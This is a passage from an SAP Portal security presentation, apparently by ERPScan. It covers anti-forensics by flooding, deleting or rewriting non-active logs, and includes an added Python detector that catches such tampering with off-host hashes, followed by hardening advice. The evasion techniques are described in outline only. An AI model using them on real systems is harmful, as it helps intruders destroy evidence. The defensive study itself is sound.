•  Deleting
•  Changing
• 82. Anti-forensics
Log flooding
•  5 active logs
•  Maximum log file size is 10 MB
•  Archiving when all logs reach the maximum size
•  If file.0.log -> max size, then open file.1.log
•  If file.4.log -> max size, then zip all and back up
•  Rewriting the same files after archiving
• 83. Anti-forensics
Log deleting
•  SAP locks write access only to the single active log
•  SAP allows reading/writing logs, so it is possible to delete them
•  But deleting could give away the attacker's presence
Log changing
•  SAP locks write access only to the single active log
•  It is possible to write into any other log file
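The rotation scheme on slide 82 and the two tampering options on slide 83 can each be detected from an off-host record of the closed log files. The added example (mine, not the presenters' or SAP's code) keeps a hash and size for every closed file, treats any later change as tampering and any disappearance as deletion, flags a closed file that is smaller than the rotation size, and reports flooding when too many rotations land in one window. File contents are passed in as bytes so the logic runs offline; the 10 MB size and five-file count come from the slide.

```python
"""Detecting log flooding, deletion and modification from an off-host ledger
(constructed example)."""
import hashlib
from datetime import datetime, timedelta

MAX_LOG_BYTES = 10 * 1024 * 1024   # slide 82: 10 MB per log file
ACTIVE_LOGS = 5                    # slide 82: file.0.log .. file.4.log


def sha256(data):
    return hashlib.sha256(data).hexdigest()


class LogLedger:
    """Off-host record of closed log files. Only the active file (*.0.log) is supposed
    to change, so any difference in the others is an alert."""

    def __init__(self, max_bytes=MAX_LOG_BYTES):
        self.max_bytes = max_bytes
        self.closed = {}      # name -> (sha256, size)
        self.rotations = []   # times at which a new closed log first appeared

    def snapshot(self, files, now):
        """files: mapping name -> bytes (stands in for reading the log directory).
        Returns the list of alerts raised by this snapshot."""
        alerts = []
        for name, data in files.items():
            if name.endswith(".0.log"):
                continue  # the active log is allowed to grow
            digest = (sha256(data), len(data))
            if name not in self.closed:
                self.closed[name] = digest
                self.rotations.append(now)
                if len(data) < self.max_bytes:
                    alerts.append(f"{name}: closed log is smaller than the rotation size (truncated?)")
            elif self.closed[name] != digest:
                alerts.append(f"{name}: closed log changed after rotation (tampering)")
        for name in sorted(set(self.closed) - set(files)):
            alerts.append(f"{name}: closed log disappeared (deleted)")
        return alerts

    def archived(self):
        """Call after the legitimate zip-and-backup of all files has been verified."""
        self.closed.clear()

    def flooding(self, now, window=timedelta(minutes=10), threshold=ACTIVE_LOGS - 1):
        """Too many rotations in one window means someone is pushing evidence into
        the archive-and-overwrite cycle."""
        recent = [t for t in self.rotations if timedelta(0) <= now - t <= window]
        return len(recent) >= threshold


if __name__ == "__main__":
    ledger = LogLedger(max_bytes=8)
    t0 = datetime(2013, 4, 10, 2, 0, 0)
    print(ledger.snapshot({"file.0.log": b"a", "file.1.log": b"closed one"}, t0))
    print(ledger.snapshot({"file.0.log": b"ab", "file.1.log": b"closed one, edited"}, t0 + timedelta(minutes=1)))
```

The ledger has to live somewhere the Portal account cannot write, which is the point of slide 84's "additional place for log storage"; copying the closed files themselves there alongside the hashes preserves the evidence even when the originals are later overwritten by the archive cycle.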
• 84. Securing SAP Portal
•  Patching
•  Secure configuration
•  Enabling HTTP Trace with masking
•  Malicious script filter
•  Log archiving
•  Additional place for log storage
•  Monitoring of security events
   –  Own scripts, parse common patterns
   –  ERPScan has all existing web vulns/0-day patterns
• 85. Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
SAP guides
It's all in your hands:
Regular security assessments
ABAP code review
Monitoring technical security
Segregation of duties
• 86. Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
July 31 – BlackHat (Las Vegas, USA)
• 87. Web: www.erpscan.com
e-mail: info@erpscan.com
Twitter: @erpscan @_chipik @neyolov